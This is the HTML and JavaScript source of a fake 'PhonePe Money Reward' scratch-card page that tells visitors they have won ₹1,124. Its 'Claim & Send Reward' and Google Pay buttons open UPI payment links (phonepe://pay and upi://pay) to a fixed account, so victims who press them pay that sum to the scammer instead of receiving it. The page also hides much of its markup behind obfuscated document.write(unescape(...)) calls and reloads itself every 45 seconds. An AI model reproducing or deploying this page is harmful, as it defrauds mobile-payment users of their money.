<!-- START MAIN CODE --> <script type="text/javascript">setInterval(function() {    window.location.reload();}, 45000); </script><!DOCTYPE html><html lang="en"><head><!-- Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-172918990-1"></script><script>  window.dataLayer = window.dataLayer || [];  function gtag(){dataLayer.push(arguments);}  gtag('js', new Date());  gtag('config', 'UA-172918990-1');</script> <script language="Javascript">document.write(unescape('   <meta charset="UTF-8">
	<meta name="theme-color" content="#5F259F">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>You've Won PhonePe Money Reward !!</title>
    <link rel="stylesheet" href="./assets/css/style.css" />
<link rel="apple-touch-icon" sizes="180x180" href="./fav/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="./fav/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="./fav/favicon-16x16.png">
<link rel="manifest" href="./fav/site.webmanifest">
</head>

<body>
    <div class="container">
        <div class="head">
            <span class="ht">You've Won PhonePe Money Reward!!</span>
        </div>'));  </script><br><script language="Javascript">document.write(unescape('<style>
.notification {
  background-color: #4caf50;
  color: white;
  text-decoration: none;
  padding: 10px 10px;
  position: relative;
  display: inline-block;
  border-radius: 5px;
  width: 88%;
}

.notification:hover {
  background: red;
}

.notification .badge {
  position: absolute;
  top: -10px;
  right: -10px;
  padding: 5px 10px;
  border-radius: 50%;
  background-color: red;
  color: white;
}
</style>
<center><div class="notification">'));  </script>  <span>अपने अकाउंट में लेने के लिए आपके Bank अकाउंट में <b>Rs.5,000/-</b> Balance होने चाहिए, अनियतः आप (Cashback/Reward) को प्राप्त नहीं कर सकते।</span>  <span class="badge">1</span></div></center><script language="Javascript">document.write(unescape('        <div class="body">
            <div class="sec-1">
                <img src="./assets/img/1.png" alt="" class="logo" />
                <div class="sec-1-1">
                    <span>PhonePe Money Reward</span>
                    <span class="addr">GetReward@ybl</span>
                </div>
            </div>
            <div class="sec-2">
                <div class="container" id="scratch-container">
                    <canvas class="canvas" id="scratch-canvas" width="200" height="200"></canvas>
                    <form class="form" style="visibility: hidden;">
                        <div class="form-container">
                            <img src="./assets/img/2.png" alt="" />
                            <span class="wt">You've Won</span>'));  </script>                            <span class="price">₹ 1,124</span>                  <script language="Javascript">document.write(unescape('      </div>
                    </form>
                </div>
            </div>
            <div class="sec-3">
                <span>Next Step :</span>
                <span>Click sent to get reward on your bank account directly.</span>
            </div>
        </div>
        <div class="foot">'));  </script>             <script language="Javascript">document.write(unescape('<button onclick="processReward(this)" aria-href="phonepe://pay?pa=Q42537337@ybl&pn=Claim Your Reward Now&cu=INR&am='));  </script>1124&tn=Claim Money" disabled="disabled" class="claim">Claim & Send Reward to your Bank</button>			       </div>        <div class="modal">            <div class="body">                <button id="close">&#x2716;</button>               <span><b>Claim Money via Google Pay</b></span>                <span>If your not a phonepe user, try google pay reward</span>				<div class="paymentgateway"><img src="./assets/img/google-pay-badge.png"></div>				<span><a href="upi://pay?pa=Q42537337@ybl&amp;pn=Payout&amp;cu=INR&amp;am=1124&amp;tn=Final Step"><div class="gpaybutton">Process to Payout</div></a></span><script language="Javascript">document.write(unescape('            </div>
        </div>
    </div>
    <script>
        function processReward(e) {
            let modal = document.querySelector('.modal');
            modal.classList.add("fade-in");
            modal.style.display = "block";
            modal.style.visibility = "visible";
            setTimeout(() => {
                modal.classList.remove("fade-in");
            }, 1000);

            window.location = e.getAttribute("aria-href");
        }

        document.querySelector("#close").onclick = () => {
            let modal = document.querySelector('.modal');
            modal.classList.add("fade-out");
            setTimeout(() => {
                modal.style.display = "none";
                modal.style.visibility = "hidden";
                modal.classList.remove("fade-out");
            }, 1000);
        }
    </script>
    <script src="./assets/js/script.js"></script>
</body>

</html>'));  </script>